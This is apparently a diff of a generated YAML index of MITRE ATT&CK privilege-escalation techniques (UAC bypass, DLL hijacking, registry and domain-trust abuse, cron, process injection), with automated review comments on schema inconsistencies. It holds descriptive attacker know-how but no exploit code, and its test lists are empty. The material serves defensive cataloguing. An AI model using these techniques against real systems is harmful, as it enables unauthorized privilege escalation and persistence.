Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15810,7 +16076,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15841,7 +16106,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -15875,13 +16140,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
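Review bot: T1548.003 loses `x_mitre_attack_spec_version: 2.1.0` (alongside `spec_version`) and nothing replaces it in this hunk, so the object now ends at `x_mitre_effective_permissions` with no attack-spec version at all; compare T1574.011 immediately below, where the removed 2.1.0 is re-added as 3.2.0 at the end of the object. T1055.003, T1546.011 and T1547.005 lose the key the same way. If the generator only re-emits the key for objects present in the current upstream bundle, these four are stale entries and should be called out; if not, the key should be re-added for them.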
@@ -15900,7 +16163,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -15914,7 +16176,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -15941,8 +16202,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -15973,12 +16234,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16050,9 +16312,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16068,12 +16330,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16148,12 +16409,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16173,9 +16433,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16195,9 +16460,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
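Review bot: replacing `Azure AD` and `SaaS` with `Identity Provider` in `x_mitre_platforms` (and bumping `x_mitre_version` to 2.1) changes the string that per-platform indexes are keyed on, so any index still generated from the old platform names will silently drop T1484.002 unless it is regenerated or the generator maps old names to new. The same applies to T1098.003 further down, where `Office 365` and `Google Workspace` collapse into `Office Suite` and `Azure AD` into `Identity Provider`. Confirm the platform-specific indexes were regenerated after this rename rather than patched by hand.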
@@ -16214,6 +16478,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16247,7 +16515,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16403,31 +16670,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
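Review bot: this T1053.003 hunk removes `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` only for the following two hunks to re-add the same values (plus `revoked: false`, `x_mitre_remote_support: false` and `x_mitre_deprecated: false`) at other positions in the object; the only substantive changes are `modified`, `x_mitre_version` 1.1 to 1.2 and the attack spec version 2.1.0 to 3.2.0. Since YAML mapping order carries no meaning here, have the generator emit keys in a fixed order so a refresh produces a reviewable diff instead of a wholesale reorder of every object.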
@@ -16444,6 +16691,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16454,9 +16702,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16464,13 +16716,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16500,6 +16768,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16510,6 +16779,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16518,13 +16788,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16566,9 +16836,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16636,19 +16903,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16664,8 +16930,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16679,7 +16945,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16705,6 +16971,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -16732,12 +17002,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16763,7 +17032,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16805,7 +17074,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -16883,11 +17151,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -16967,7 +17234,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
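Review bot: the new T1098.007 entry ends with `x_mitre_modified_by_ref` and goes straight to `atomic_tests: []`, with no `identifier: T1098.007` line, whereas neighbouring entries such as T1547.010, T1547.009 and T1611 carry `identifier:` before `atomic_tests:`; T1053 directly above and T1574.014 and T1098.006 earlier also lack it, so either the key is optional and the inconsistency is pre-existing, or the generator drops it for some objects and this is a bug worth a check. For awareness only, since it is upstream ATT&CK content rather than something to edit here: `x_mitre_detection` is empty, and `x_mitre_platforms` lists macOS although the description only gives Windows (`net localgroup` / `net group`) and Linux (`usermod`) commands.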
@@ -16990,7 +17327,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17038,8 +17375,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
@@ -17071,7 +17406,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17126,13 +17461,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17193,9 +17526,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17204,7 +17537,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -17257,7 +17589,7 @@ privilege-escalation:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17278,12 +17610,11 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -17386,7 +17717,6 @@ privilege-escalation:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1611:
@@ -17486,12 +17816,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1611
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17504,7 +17833,6 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -17517,7 +17845,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -17547,7 +17874,8 @@ privilege-escalation:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1547.005:
@@ -17574,7 +17902,7 @@ privilege-escalation:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
